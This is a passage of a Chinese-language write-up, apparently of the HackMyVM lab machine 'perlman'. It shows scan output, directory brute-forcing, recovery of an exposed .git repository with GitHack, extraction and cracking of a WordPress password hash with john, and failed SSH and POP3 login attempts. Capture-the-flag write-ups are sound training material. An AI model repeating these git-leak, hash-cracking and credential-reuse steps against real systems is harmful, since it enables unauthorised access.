2032-06-29T10:12:39\n| MD5: 1ac5:1a22:67a7:a9bc:71fd:5f87:af54:5639\n| SHA-1: c609:bc84:2ece:7080:8d0e:d169:d81c:f369:b50f:24ac\n| -----BEGIN CERTIFICATE-----\n| MIIC0zCCAbugAwIBAgIUYyfZ7xaEw82UQOeqR51M7iVeTFkwDQYJKoZIhvcNAQEL\n| BQAwEjEQMA4GA1UEAwwHcGVybG1hbjAeFw0yMjA3MDIxMDEyMzlaFw0zMjA2Mjkx\n| MDEyMzlaMBIxEDAOBgNVBAMMB3BlcmxtYW4wggEiMA0GCSqGSIb3DQEBAQUAA4IB\n| DwAwggEKAoIBAQCZHxEKTHH6Z\/ITuPkv5F2WPEYFpFPkXHsYjBXMTUBU4fnlCGKI\n| EvYMwEJ0r7IkYxnS4ilg8nbmmZ\/fJ71y5mAMPm0hp2KVxeiuxrt8FNdzhzXYuhnX\n| izlgDDEPDY5BmUCTbyjTfiyMliMO\/129VT0uatRXmiOA+HdVIMrQjdKeXrREK7jJ\n| ELYOKMOmP5ChuGlHFup+Q2s9MbxghvX6kfXqYI7jDSWBghPZ1QUMXN5wg+Ke6qzC\n| cD53CZWckw18kn9GUtU97Wnya7R1vnd0Mq+8YEs3nSSV0GXjHscNugHGHQdcgFWg\n| tAGCSOxexcr1aS\/NyuO5pKcWJc02+G4jo1hRAgMBAAGjITAfMAkGA1UdEwQCMAAw\n| EgYDVR0RBAswCYIHcGVybG1hbjANBgkqhkiG9w0BAQsFAAOCAQEAihWPgk7Hbdmp\n| kjybLZgjXyVnQsLWr\/+KZOYnPiRfrPAIWkmdZFN6BvOTB0qq+bvaYYDZJ4NtVLcc\n| sYZGwZKicE2yqr0ZI11RlBCWy5M+0\/UfDf7f4JHl5FN27LTF4wGpgQitOV9B93OC\n| MKqQYpf\/NiNrC9j7GQZtAW30ID907jY0icdNz1\/r+7vQOLQDJu8Xjmopi+BCNtzP\n| \/L21NQAZwST4l07L0Aj5SemlljRZvlqecd2QxhmyRu0Y6CPpamtWxxpRDN4LYHaa\n| gZMY6SJ9Q79QNnF1L+CI1Ups9MpcjQoBZm2s5nJ24B7r1YczG6YtsTR6qgqnMnqr\n| LU3nfj\/LUw==\n|_-----END CERTIFICATE-----\n|_ssl-date: TLS randomness does not represent time\n119\/tcp open nntp syn-ack InterNetNews (INN) 2.6.4\n995\/tcp open ssl\/pop3 syn-ack Dovecot pop3d\n| ssl-cert: Subject: commonName=perlman\n| Subject Alternative Name: DNS:perlman\n| Issuer: commonName=perlman\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2022-07-02T10:12:39\n| Not valid after: 2032-06-29T10:12:39\n| MD5: 1ac5:1a22:67a7:a9bc:71fd:5f87:af54:5639\n| SHA-1: c609:bc84:2ece:7080:8d0e:d169:d81c:f369:b50f:24ac\n| -----BEGIN CERTIFICATE-----\n| MIIC0zCCAbugAwIBAgIUYyfZ7xaEw82UQOeqR51M7iVeTFkwDQYJKoZIhvcNAQEL\n| BQAwEjEQMA4GA1UEAwwHcGVybG1hbjAeFw0yMjA3MDIxMDEyMzlaFw0zMjA2Mjkx\n| MDEyMzlaMBIxEDAOBgNVBAMMB3BlcmxtYW4wggEiMA0GCSqGSIb3DQEBAQUAA4IB\n| DwAwggEKAoIBAQCZHxEKTHH6Z\/ITuPkv5F2WPEYFpFPkXHsYjBXMTUBU4fnlCGKI\n| EvYMwEJ0r7IkYxnS4ilg8nbmmZ\/fJ71y5mAMPm0hp2KVxeiuxrt8FNdzhzXYuhnX\n| izlgDDEPDY5BmUCTbyjTfiyMliMO\/129VT0uatRXmiOA+HdVIMrQjdKeXrREK7jJ\n| ELYOKMOmP5ChuGlHFup+Q2s9MbxghvX6kfXqYI7jDSWBghPZ1QUMXN5wg+Ke6qzC\n| cD53CZWckw18kn9GUtU97Wnya7R1vnd0Mq+8YEs3nSSV0GXjHscNugHGHQdcgFWg\n| tAGCSOxexcr1aS\/NyuO5pKcWJc02+G4jo1hRAgMBAAGjITAfMAkGA1UdEwQCMAAw\n| EgYDVR0RBAswCYIHcGVybG1hbjANBgkqhkiG9w0BAQsFAAOCAQEAihWPgk7Hbdmp\n| kjybLZgjXyVnQsLWr\/+KZOYnPiRfrPAIWkmdZFN6BvOTB0qq+bvaYYDZJ4NtVLcc\n| sYZGwZKicE2yqr0ZI11RlBCWy5M+0\/UfDf7f4JHl5FN27LTF4wGpgQitOV9B93OC\n| MKqQYpf\/NiNrC9j7GQZtAW30ID907jY0icdNz1\/r+7vQOLQDJu8Xjmopi+BCNtzP\n| \/L21NQAZwST4l07L0Aj5SemlljRZvlqecd2QxhmyRu0Y6CPpamtWxxpRDN4LYHaa\n| gZMY6SJ9Q79QNnF1L+CI1Ups9MpcjQoBZm2s5nJ24B7r1YczG6YtsTR6qgqnMnqr\n| LU3nfj\/LUw==\n|_-----END CERTIFICATE-----\n|_ssl-date: TLS randomness does not represent time\n|_pop3-capabilities: USER SASL(PLAIN) UIDL RESP-CODES TOP PIPELINING CAPA AUTH-RESP-CODE\nService Info: Hosts: perlman.hmv, server.example.net; OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u53d1\u73b0\u4e86.git<\/code>\u63a5\u7740\u770b\uff1a<\/p>\n\u76ee\u5f55\u7206\u7834<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html -q\n\/.html (Status: 403) [Size: 278]\n\/.php (Status: 403) [Size: 278]\n\/index.html (Status: 200) [Size: 47426]\n\/images (Status: 301) [Size: 315] [--> http:\/\/192.168.0.176\/images\/]\n\/css (Status: 301) [Size: 312] [--> http:\/\/192.168.0.176\/css\/]\n\/privacy-policy.html (Status: 200) [Size: 25624]\n\/js (Status: 301) [Size: 311] [--> http:\/\/192.168.0.176\/js\/]\n\/terms-conditions.html (Status: 200) [Size: 18494]\n\/.php (Status: 403) [Size: 278]\n\/.html (Status: 403) [Size: 278]\n\/server-status (Status: 403) [Size: 278]<\/code><\/pre>\n\u9ed8\u8ba4\u7684\u90a3\u4e2a\/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt<\/code>\u5b57\u5178\u626b\u4e0d\u51fa\u6765git\uff0c\u5c1d\u8bd5\u6362\u4e2a\u518d\u626b\u4e00\u4e0b\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ sudo dirsearch -u http:\/\/$IP\/ -e* -i 200,300-399 2>\/dev\/null\n\n _|. _ _ _ _ _ _|_ v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594\n\nOutput File: \/home\/kali\/temp\/perlman\/reports\/http_192.168.0.176\/__24-07-10_21-48-31.txt\n\nTarget: http:\/\/192.168.0.176\/\n\n[21:48:31] Starting: \n[21:48:32] 301 - 311B - \/js -> http:\/\/192.168.0.176\/js\/\n[21:48:40] 200 - 73B - \/.git\/description\n[21:48:40] 200 - 0B - \/.git\/\n[21:48:40] 200 - 23B - \/.git\/HEAD\n[21:48:40] 301 - 313B - \/.git -> http:\/\/192.168.0.176\/.git\/\n[21:48:40] 200 - 412B - \/.git\/branches\/\n[21:48:40] 200 - 92B - \/.git\/config\n[21:48:40] 200 - 673B - \/.git\/hooks\/\n[21:48:41] 200 - 409B - \/.git\/logs\/HEAD\n[21:48:41] 200 - 483B - \/.git\/logs\/\n[21:48:40] 200 - 3B - \/.git\/COMMIT_EDITMSG\n[21:48:41] 200 - 459B - \/.git\/info\/\n[21:48:41] 200 - 240B - \/.git\/info\/exclude\n[21:48:41] 301 - 323B - \/.git\/logs\/refs -> http:\/\/192.168.0.176\/.git\/logs\/refs\/\n[21:48:41] 200 - 409B - \/.git\/logs\/refs\/heads\/master\n[21:48:41] 200 - 463B - \/.git\/refs\/\n[21:48:41] 301 - 329B - \/.git\/logs\/refs\/heads -> http:\/\/192.168.0.176\/.git\/logs\/refs\/heads\/\n[21:48:41] 301 - 323B - \/.git\/refs\/tags -> http:\/\/192.168.0.176\/.git\/refs\/tags\/\n[21:48:41] 301 - 324B - \/.git\/refs\/heads -> http:\/\/192.168.0.176\/.git\/refs\/heads\/\n[21:48:41] 200 - 2KB - \/.git\/index\n[21:48:41] 200 - 41B - \/.git\/refs\/heads\/master\n[21:48:41] 200 - 690B - \/.git\/objects\/\n[21:51:12] 301 - 312B - \/css -> http:\/\/192.168.0.176\/css\/\n[21:52:09] 200 - 898B - \/images\/\n[21:52:10] 301 - 315B - \/images -> http:\/\/192.168.0.176\/images\/\n[21:52:24] 200 - 578B - \/js\/\n\nTask Completed<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
<\/div>
\n<\/div><\/p>\ngit\u6cc4\u9732<\/h3>\n
\u4e00\u773c\u770b\u5230git\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6cc4\u9732\u4e86\u54ea\u4e9b\u4fe1\u606f\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ python2 \/home\/kali\/GitHack\/GitHack.py http:\/\/$IP\/.git\/ \n\n ____ _ _ _ _ _\n \/ ___(_) |_| | | | __ _ ___| | __\n| | _| | __| |_| |\/ _` |\/ __| |\/ \/\n| |_| | | |_| _ | (_| | (__| <\n \\____|_|\\__|_| |_|\\__,_|\\___|_|\\_\\{0.0.5}\n A '.git' folder disclosure exploit.\n\n[*] Check Depends\n[+] Check depends end\n[*] Set Paths\n[*] Target Url: http:\/\/192.168.0.176\/.git\/\n[*] Initialize Target\n[*] Try to Clone straightly\n[*] Clone\nCloning into '\/home\/kali\/GitHack\/dist\/192.168.0.176'...\nfatal: repository 'http:\/\/192.168.0.176\/.git\/' not found\n[-] Clone Error\n[*] Try to Clone with Directory Listing\n[*] http:\/\/192.168.0.176\/.git\/ is not support Directory Listing\n[-] [Skip][First Try] Target is not support Directory Listing\n[*] Try to clone with Cache\n[*] Initialize Git\n[!] Initialize Git Error: hint: Using 'master' as the name for the initial branch. This default branch name\nhint: is subject to change. To configure the initial branch name to use in all\nhint: of your new repositories, which will suppress this warning, call:\nhint: \nhint: git config --global init.defaultBranch <name>\nhint: \nhint: Names commonly chosen instead of 'master' are 'main', 'trunk' and\nhint: 'development'. The just-created branch can be renamed via this command:\nhint: \nhint: git branch -m <name>\n\n[*] Cache files\n[*] packed-refs\n[*] config\n[*] HEAD\n[*] COMMIT_EDITMSG\n[*] ORIG_HEAD\n[*] FETCH_HEAD\n[*] refs\/heads\/master\n[*] refs\/remote\/master\n[*] index\n[*] logs\/HEAD\n[*] logs\/refs\/heads\/master\n[*] Fetch Commit Objects\n[*] objects\/40\/f3ff4215a1102c35447533676797ec06f8ffd9\n[*] objects\/70\/8220d31a540e356d8fd63fa1cc3d066199109a\n[*] objects\/0c\/f1c46eefb7c5ebaf8d066e0b5cd730d7c8c58f\n[*] objects\/ad\/422b39a4cdc8b5541a34c73756fe9c7ea87341\n[*] objects\/fb\/435af2cb9880a1b016c9d268a772587f15b01f\n[*] objects\/03\/9117dcf7eb7728a1e743d8b88ae88ed9f5f1cf\n[*] objects\/46\/2a3534e258daf09a0d2d9f324674c913dcbe31\n[*] objects\/90\/fc1a09cda9208e4d85cb62f0017cd3ebaf54e8\n[*] objects\/d5\/16536b94baeafb5ee6396a9d8b915a2ca5d399\n[*] objects\/f6\/cec0bc7daea37ac9e9c488d16a982d5f5b2c6d\n[*] objects\/78\/d1e9f6d53308ac6604cea994700c6df88da6f4\n[*] objects\/8b\/0d7de5c057dce3ab17d99e7766008c783bc287\n[*] objects\/81\/ecb6e0365bb60b6324d7b90f17df3fe949ccab\n[*] objects\/ad\/3f4525e7ceaba5e7af542d1dfd0ef6abb6b0a0\n[*] objects\/15\/8c826eec8513cc3eb8f9b9cfece64b73ecb256\n[*] objects\/00\/933018b10d9015482170a1b4b11611407334ba\n[*] objects\/8a\/5646ddca34e046cc2f172d98ce29d00ea39b63\n[*] objects\/d0\/1f63dba38e3e1d317502ec1d3cc6dd2d32cc7b\n[*] objects\/14\/424894c70ea1e64d3caf3bf7d24146a5a7b62d\n[*] objects\/1b\/6cc566a580516af2ae08b0e18cc30b7257d85c\n[*] objects\/43\/89ca985f8f6a8381bdeed57b0f678862b9c358\n[*] objects\/03\/d2ecd9e468cf069c51600ecbe13cf48136abe5\n[*] objects\/7e\/4c0667750620966b07dd4f3548cf04a43d9ffc\n[*] objects\/14\/5d3f7b92190c61bc700e06cac301867c912ead\n[*] objects\/a7\/4a3ab9c8047c8b96522ccc9554f2d8d9d7c37b\n[*] objects\/7c\/c33f9ce2b2b70d6ee3e4ca77db0305ba5b58a7\n[*] objects\/02\/2e935047123ce265a42a7d58a9e4d4fb8d59c9\n[*] objects\/87\/057e525b9791571806e63244bcf7c710d56ac0\n[*] objects\/7f\/e7dd389a3e63bb67ed90853c58a97c5a89d66c\n[*] objects\/d2\/9e54424558256922c83396a320ff7fec2a81dc\n[*] objects\/df\/304da7158234a923bb717fc72be3c20e2864b3\n[*] objects\/11\/c0725279f8dedf58b47412ba9faa5f6282c46a\n[*] objects\/57\/2f66c0aa68b1bbca2e73f6fc47b6dcf63d8d72\n[*] Fetch Commit Objects End\n[*] logs\/refs\/remote\/master\n[*] logs\/refs\/stash\n[*] refs\/stash\n[*] Valid Repository\n[+] Valid Repository Success\n\n[+] Clone Success. Dist File : \/home\/kali\/GitHack\/dist\/192.168.0.176<\/code><\/pre>\n\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176]\n\u2514\u2500$ ls -la\ntotal 1212\ndrwxr-xr-x 4 kali kali 4096 Jul 10 22:00 .\ndrwxr-xr-x 4 kali kali 4096 Jul 10 22:00 ..\n-rw-r--r-- 1 kali kali 2144 Jul 10 22:00 commentmeta.sql\n-rw-r--r-- 1 kali kali 3538 Jul 10 22:00 comments.sql\ndrwxr-xr-x 2 kali kali 4096 Jul 10 22:00 db\ndrwxr-xr-x 8 kali kali 4096 Jul 10 22:00 .git\n-rw-r--r-- 1 kali kali 2720 Jul 10 22:00 links.sql\n-rw-r--r-- 1 kali kali 1082657 Jul 10 22:00 options.sql\n-rw-r--r-- 1 kali kali 2502 Jul 10 22:00 postmeta.sql\n-rw-r--r-- 1 kali kali 13542 Jul 10 22:00 posts.sql\n-rw-r--r-- 1 kali kali 2713 Jul 10 22:00 tcp_addresses.sql\n-rw-r--r-- 1 kali kali 24292 Jul 10 22:00 tcp_countries.sql\n-rw-r--r-- 1 kali kali 11572 Jul 10 22:00 tcp_currencies.sql\n-rw-r--r-- 1 kali kali 2051 Jul 10 22:00 tcp_orders_costsmeta.sql\n-rw-r--r-- 1 kali kali 2121 Jul 10 22:00 tcp_orders_costs.sql\n-rw-r--r-- 1 kali kali 2067 Jul 10 22:00 tcp_orders_detailsmeta.sql\n-rw-r--r-- 1 kali kali 2633 Jul 10 22:00 tcp_orders_details.sql\n-rw-r--r-- 1 kali kali 2003 Jul 10 22:00 tcp_ordersmeta.sql\n-rw-r--r-- 1 kali kali 4133 Jul 10 22:00 tcp_orders.sql\n-rw-r--r-- 1 kali kali 2055 Jul 10 22:00 tcp_rel_entities.sql\n-rw-r--r-- 1 kali kali 1905 Jul 10 22:00 tcp_taxes.sql\n-rw-r--r-- 1 kali kali 2196 Jul 10 22:00 tcp_tax_rates.sql\n-rw-r--r-- 1 kali kali 2114 Jul 10 22:00 termmeta.sql\n-rw-r--r-- 1 kali kali 2162 Jul 10 22:00 term_relationships.sql\n-rw-r--r-- 1 kali kali 2247 Jul 10 22:00 terms.sql\n-rw-r--r-- 1 kali kali 2446 Jul 10 22:00 term_taxonomy.sql\n-rw-r--r-- 1 kali kali 3943 Jul 10 22:00 usermeta.sql\n-rw-r--r-- 1 kali kali 2763 Jul 10 22:00 users.sql\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176]\n\u2514\u2500$ cat users.sql \n-- MariaDB dump 10.19 Distrib 10.5.15-MariaDB, for debian-linux-gnu (x86_64)\n--\n-- Host: localhost Database: wordpressdb\n-- ------------------------------------------------------\n-- Server version 10.5.15-MariaDB-0+deb11u1\n\n\/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT *\/;\n\/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS *\/;\n\/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION *\/;\n\/*!40101 SET NAMES utf8mb4 *\/;\n\/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE *\/;\n\/*!40103 SET TIME_ZONE='+00:00' *\/;\n\/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 *\/;\n\/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 *\/;\n\/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' *\/;\n\/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 *\/;\n\n--\n-- Table structure for table `users`\n--\n\nDROP TABLE IF EXISTS `users`;\n\/*!40101 SET @saved_cs_client = @@character_set_client *\/;\n\/*!40101 SET character_set_client = utf8 *\/;\nCREATE TABLE `users` (\n `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,\n `user_login` varchar(60) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',\n `user_pass` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',\n `user_nicename` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',\n `user_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',\n `user_url` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',\n `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',\n `user_activation_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',\n `user_status` int(11) NOT NULL DEFAULT 0,\n `display_name` varchar(250) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',\n PRIMARY KEY (`ID`),\n KEY `user_login_key` (`user_login`),\n KEY `user_nicename` (`user_nicename`),\n KEY `user_email` (`user_email`)\n) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;\n\/*!40101 SET character_set_client = @saved_cs_client *\/;\n\n--\n-- Dumping data for table `users`\n--\n\nLOCK TABLES `users` WRITE;\n\/*!40000 ALTER TABLE `users` DISABLE KEYS *\/;\nINSERT INTO `users` VALUES (1,'webmaster','','webmaster','webmaster@perlman.hmv','http:\/\/perlman.hmv','2022-07-03 16:23:02','',0,'webmaster');\n\/*!40000 ALTER TABLE `users` ENABLE KEYS *\/;\nUNLOCK TABLES;\n\/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE *\/;\n\n\/*!40101 SET SQL_MODE=@OLD_SQL_MODE *\/;\n\/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS *\/;\n\/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS *\/;\n\/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT *\/;\n\/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS *\/;\n\/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION *\/;\n\/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES *\/;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176]\n\u2514\u2500$ cd db \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176\/db]\n\u2514\u2500$ ls -la\ntotal 12\ndrwxr-xr-x 2 kali kali 4096 Jul 10 22:00 .\ndrwxr-xr-x 4 kali kali 4096 Jul 10 22:00 ..\n-rw-r--r-- 1 kali kali 305 Jul 10 22:00 index.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176\/db]\n\u2514\u2500$ cat index.php \n<?php\n\n error_reporting(0);\n $allow = ['perlman', 'perlman.htb'];\n if(!isset($_SERVER['HTTP_X_FORWARDED_FOR']) || !in_array($_SERVER['HTTP_X_FORWARDED_FOR'], $allow)) {\n die('Access allowed only for perlman.htb staff.');\n } else {\n header('location: old_backup_2009');\n\n }\n\n?><\/code><\/pre>\n\u627e\u5230\u4e86\u4e00\u4e2a\u57df\u540d\u89e3\u6790http:\/\/perlman.hmv<\/code>\u4ee5\u53ca\u627e\u4e0d\u5230\u5bc6\u7801\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u5386\u53f2\u6570\u636e\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176\/db]\n\u2514\u2500$ git log \ncommit 40f3ff4215a1102c35447533676797ec06f8ffd9 (HEAD -> master)\nAuthor: root <root@perlman>\nDate: Sat Sep 10 15:30:23 2022 +0200\n\n wp\n\ncommit 0cf1c46eefb7c5ebaf8d066e0b5cd730d7c8c58f\nAuthor: root <root@perlman>\nDate: Sat Sep 10 15:29:12 2022 +0200\n\n config\n\ncommit d29e54424558256922c83396a320ff7fec2a81dc\nAuthor: root <root@perlman>\nDate: Sat Sep 10 15:28:36 2022 +0200\n\n perlman\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176\/db]\n\u2514\u2500$ git diff 40f3ff 0cf1c4\ndiff --git a\/db\/index.php b\/db\/index.php\ndeleted file mode 100644\nindex 11c0725..0000000\n--- a\/db\/index.php\n+++ \/dev\/null\n@@ -1,12 +0,0 @@\n-<?php\n-\n- error_reporting(0);\n- $allow = ['perlman', 'perlman.htb'];\n- if(!isset($_SERVER['HTTP_X_FORWARDED_FOR']) || !in_array($_SERVER['HTTP_X_FORWARDED_FOR'], $allow)) {\n- die('Access allowed only for perlman.htb staff.');\n- } else {\n- header('location: old_backup_2009');\n-\n- }\n-\n-?>\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176\/db]\n\u2514\u2500$ git diff 40f3ff d29e54\ndiff --git a\/db\/index.php b\/db\/index.php\ndeleted file mode 100644\nindex 11c0725..0000000\n--- a\/db\/index.php\n+++ \/dev\/null\n@@ -1,12 +0,0 @@\n-<?php\n-\n- error_reporting(0);\n- $allow = ['perlman', 'perlman.htb'];\n- if(!isset($_SERVER['HTTP_X_FORWARDED_FOR']) || !in_array($_SERVER['HTTP_X_FORWARDED_FOR'], $allow)) {\n- die('Access allowed only for perlman.htb staff.');\n- } else {\n- header('location: old_backup_2009');\n-\n- }\n-\n-?>\ndiff --git a\/users.sql b\/users.sql\nindex 7fe7dd3..572f66c 100644\n--- a\/users.sql\n+++ b\/users.sql\n@@ -46,7 +46,7 @@ CREATE TABLE `users` (\n\n LOCK TABLES `users` WRITE;\n \/*!40000 ALTER TABLE `users` DISABLE KEYS *\/;\n-INSERT INTO `users` VALUES (1,'webmaster','','webmaster','webmaster@perlman.hmv','http:\/\/perlman.hmv','2022-07-03 16:23:02','',0,'webmaster');\n+INSERT INTO `users` VALUES (1,'webmaster','$P$BCaMhRZQp\/mi0nyIVVPS6u1EU8sTCR\/','webmaster','webmaster@perlman.hmv','http:\/\/perlman.hmv','2022-07-03 16:23:02','',0,'webmaster');\n \/*!40000 ALTER TABLE `users` ENABLE KEYS *\/;\n UNLOCK TABLES;\n \/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE *\/;<\/code><\/pre>\n\u627e\u5230\u4e86 hash\uff0c\u5c1d\u8bd5\u7834\u89e3\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ echo '$P$BCaMhRZQp\/mi0nyIVVPS6u1EU8sTCR\/' > hash\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ john hash\nUsing default input encoding: UTF-8\nLoaded 1 password hash (phpass [phpass ($P$ or $H$) 128\/128 SSE2 4x3])\nCost 1 (iteration count) is 8192 for all loaded hashes\nWill run 2 OpenMP threads\nProceeding with single, rules:Single\nPress 'q' or Ctrl-C to abort, almost any other key for status\nAlmost done: Processing the remaining buffered candidate passwords, if any.\nProceeding with wordlist:\/usr\/share\/john\/password.lst\ncookie (?) \n1g 0:00:00:00 DONE 2\/3 (2024-07-10 22:11) 3.571g\/s 1371p\/s 1371c\/s 1371C\/s purple..larry\nUse the "--show --format=phpass" options to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n\u6dfb\u52a0\u4e00\u4e0b\u57df\u540d\u89e3\u6790\u4ee5\u53ca\u5c1d\u8bd5\u8bbf\u95ee\uff1a<\/p>\n
192.168.0.176 perlman.hmv<\/code><\/pre>\n\u518d\u6b21\u626b\u63cf\u4e00\u4e0b\u8bd5\u8bd5\uff0c\u53d1\u73b0\u8fd8\u662f\u4e00\u65e0\u6240\u83b7\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ gobuster dir -u http:\/\/perlman.hmv -q -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html \n\/.php (Status: 403) [Size: 276]\n\/index.html (Status: 200) [Size: 47426]\n\/.html (Status: 403) [Size: 276]\n\/images (Status: 301) [Size: 311] [--> http:\/\/perlman.hmv\/images\/]\n\/css (Status: 301) [Size: 308] [--> http:\/\/perlman.hmv\/css\/]\n\/privacy-policy.html (Status: 200) [Size: 25624]\n\/js (Status: 301) [Size: 307] [--> http:\/\/perlman.hmv\/js\/]\n\/terms-conditions.html (Status: 200) [Size: 18494]\n\/.php (Status: 403) [Size: 276]\n\/.html (Status: 403) [Size: 276]\n\/server-status (Status: 403) [Size: 276]<\/code><\/pre>\n\u654f\u611f\u7aef\u53e3\u63a2\u6d4b<\/h3>\n
\u770b\u4e00\u4e0b\u5176\u4ed6\u7aef\u53e3\u662f\u5426\u53ef\u4ee5\u8fdb\u884c\u6d4b\u8bd5\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ nmap 192.168.0.176 | grep open\n22\/tcp open ssh\n25\/tcp open smtp\n80\/tcp open http\n110\/tcp open pop3\n119\/tcp open nntp\n995\/tcp open pop3s<\/code><\/pre>\n\u5148\u5c1d\u8bd5 ssh\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ ssh webmaster@$IP \nThe authenticity of host '192.168.0.176 (192.168.0.176)' can't be established.\nED25519 key fingerprint is SHA256:mj3kS8pBIwV9crKMRcQXj7whxG9JknAzXwJQeohBVPg.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '192.168.0.176' (ED25519) to the list of known hosts.\nwebmaster@192.168.0.176: Permission denied (publickey).<\/code><\/pre>\n25 \u7aef\u53e3\u5f00\u653e\u7684\u662f\u90ae\u4ef6\u7cfb\u7edf\uff0c\u6682\u65f6\u5148\u4e0d\u770b\uff0c\u770b\u4e00\u4e0b 110 \u7aef\u53e3\uff1ahttps:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-pop<\/a><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ nc -nv $IP 110 \n(UNKNOWN) [192.168.0.176] 110 (pop3) open\n+OK Dovecot (Debian) ready.\nUSER webmaster\n+OK\nPASS cookie\n-ERR [AUTH] Authentication failed.\nSTAT\n-ERR Unknown command.\n^C<\/code><\/pre>\n\u5bc6\u7801\u4e0d\u6b63\u786e\uff0c\u518d\u770b\u770b\u522b\u7684\uff01<\/p>\n
